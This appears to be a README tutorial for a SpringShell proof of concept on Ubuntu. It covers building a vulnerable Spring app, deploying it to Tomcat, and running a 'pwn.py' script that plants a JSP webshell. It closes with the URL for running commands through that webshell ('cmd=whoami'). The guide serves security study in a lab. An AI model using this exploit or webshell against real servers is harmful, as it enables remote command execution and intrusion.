I present here a complete tutorial and POC for rcent SpringShell vulnerability for Spring Core module.
Running on Ubuntu (tested on 20.04)
Github: https://github.com/agentzex/spring-shell-exploit-poc
Prerequisites:
- sudo apt install default-jre
- sudo apt install default-jdk
- sudo apt install maven
- Follow this guide to install tomcat (this will install tomcat 10 which can work with slight modification that will be described here. you can also install tomcat 9 which doesn't need this modification) https://www.vultr.com/docs/install-apache-tomcat-on-ubuntu-20-04-39123/
App Preparation:
- Download the spring web app from the 'app' directory in this repo
- cd to it and run 'mvn package'
- after it's done, cd to 'target' directory which was created and copy the 'zex-poc.war' file
Deployment: tomcat-root-dir - should be '/opt/tomcat/' if you followed the above guide.
- If you're running tomcat < 10 : copy the war file to 'tomcat-root-dir/webapps/'
- If you're running tomcat 10:
- create a directory named 'webapps-javaee' in tomcat-root-dir
- copy the war file to this directory
- Tomcat will migrate the legacy J2EE war file automatically from that folder and will deploy it in tomcat-root-dir/webapps/'
- Run tomcat with tomcat-root-dir/bin/catalina.sh run' and check for errors.
- If everything worked, we can now run the poc.py file and access a browser to launch commands in the created webshell.
- Run python (or python3) pwn.py --url http://server.ip:8080/zex-poc/greeting
- Access via browser or other http client with GET: http://server.ip:8080/zex-poc/tomcatwar.jsp?pwd=j&cmd=whoami
- PWND